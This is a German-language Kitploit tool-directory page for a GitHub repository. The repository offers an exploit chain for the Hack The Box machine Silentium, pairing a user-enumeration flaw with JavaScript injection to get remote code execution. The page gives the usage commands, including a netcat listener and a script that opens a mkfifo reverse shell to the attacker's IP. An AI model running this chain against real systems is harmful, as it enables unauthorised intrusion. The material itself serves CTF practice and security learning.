Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2025-58434-59528-htb-ctf — Exploitation Silentium HTB-CTF | Kitploit
Tools/GitHubGitHub/jwsly12/cve-2025-58434-59528-htb-ctf
Payload-GenerierungExploitationWebanwendungs-ExploitationCTFPenetrationstestsLernen & Bildung
GitHubjwsly12/cve-2025-58434-59528-htb-ctf

CVE-2025-58434-59528-htb-ctf

Exploitation Silentium HTB-CTF

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Repository anzeigen
22vor 4 MonatenNoch nicht geprüft
Teilen

CVE-2025-58434-59528-htb-ctf

Silentium Exploit-Kette

Dieses Repository enthält die vollständige Exploit-Kette für die Silentium-Maschine auf Hack The Box. Der Exploit nutzt eine zweistufige Schwachstelle aus, die User-Enumeration und JavaScript-Injektion umfasst, um Remote Code Execution (RCE) zu erreichen.

📝 Beschreibung

Die Schwachstellenkette besteht aus einem Informationspreisgabefehler und einer kritischen Code-Injektion. Indem wir zunächst gültige Benutzer über einen Fehler beim Zurücksetzen des Passworts enumerieren, erhalten wir den notwendigen Kontext, um den customMCP-Endpunkt anzugreifen. Die RCE wird erreicht, indem eine bösartige JavaScript-Funktion in den Parameter mcpServerConfig injiziert wird, die vom Node.js-Backend ausgeführt wird.

🛠️ Funktionen

  • User Enumeration: Automatisiert die Entdeckung gültiger System-E-Mails mithilfe einer Wortliste.
  • JavaScript Injection: Nutzt ein IIFE (Immediately Invoked Function Expression) aus, um die Bereinigung zu umgehen.
  • TCP Reverse Shell: Erzeugt eine stabile Shell mithilfe einer mkfifo-Pipe.
  • Payload Automation: Behandelt automatisch alle JSON-Escaping- und Bearer-Token-Authentifizierungen.

🚀 Anforderungen

Sie müssen Python 3 und Bash installiert haben sowie die folgende Bibliothek:

pip install requests

💻 Verwendung

1. Benutzer enumerieren

Führen Sie das Enumerations-Skript (Bash) aus, um gültige Konten zu finden (erfordert users.txt):

python3 CVE-2025-58434.py

2. Listener starten

Starten Sie auf Ihrem lokalen Rechner einen Netcat-Listener:

nc -lvnp 4444

3. Exploit ausführen

Führen Sie das Python-Skript aus und geben Sie das Ziel, Ihre IP und den erhaltenen API-Schlüssel an:

python3 CVE-2025-59528.py -t -k <API_KEY> -l <YOUR_IP> -p 4444

⚙️ Argumente

ArgumentBeschreibungErforderlich
-t, --targetZiel-HostJa
-k, --keyAPI Bearer TokenJa
-l, --lhostIhre Listener-IP (VPN)Ja
-p, --lportIhr Listener-PortJa

⚠️ Haftungsausschluss

Dieses Skript ist ausschließlich für Bildungszwecke und autorisierte Penetrationstests in CTF-Umgebungen vorgesehen. Der Zugriff auf oder Angriff auf Ziele ohne vorherige Genehmigung ist illegal.


Challenge: Silentium (Hack The Box)
CVEs: CVE-2025-58434 | CVE-2025-59528

Tool herunterladen